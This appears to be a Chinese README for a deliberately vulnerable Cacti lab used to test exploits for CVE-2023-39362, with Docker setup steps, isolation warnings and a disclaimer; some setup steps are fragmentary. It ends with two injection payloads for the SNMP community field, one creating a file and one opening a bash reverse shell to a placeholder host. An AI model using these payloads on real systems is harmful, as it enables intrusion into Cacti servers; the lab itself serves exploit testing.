这是一个用于测试 Cacti 漏洞(CVE-2023-39362)攻击程序的漏洞应用程序。
此应用程序包含严重的安全漏洞。运行风险自负!建议使用经过备份且隔离的环境(例如具有近期快照和仅主机网络(host-only networking)的虚拟机)。请勿将此应用程序上传到任何面向互联网的服务器,否则它们将被入侵。
免责声明: 我对任何人使用此应用程序的方式不承担任何责任。此应用程序的唯一用途是作为 CVE-2023-39362 漏洞攻击程序的测试场景,不应被恶意使用。如果你的服务器因安装此应用程序而被入侵,这不是我的责任,而是上传并安装它的人的责任。
以下是搭建环境的步骤:
docker compose up -d 启动容器编排。admin/admin。admin 身份登录。guest 用户。guest 身份重新登录以尝试漏洞利用。该容器将被命名为 vuln-cacti。
测试 SNMP 设备的主机名为 monitored_snmp_device。
要拆除环境,请使用 docker compose down 命令。
Cacti 的官方安装指南可在此处找到。
(这只是一种可能的漏洞利用)
public\' ; touch /tmp/m3ssap0 ; \'。/tmp 目录下是否存在已创建的文件。要获得反弹 shell,可以使用类似如下的有效载荷。
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
本项目使用 Unlicense 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。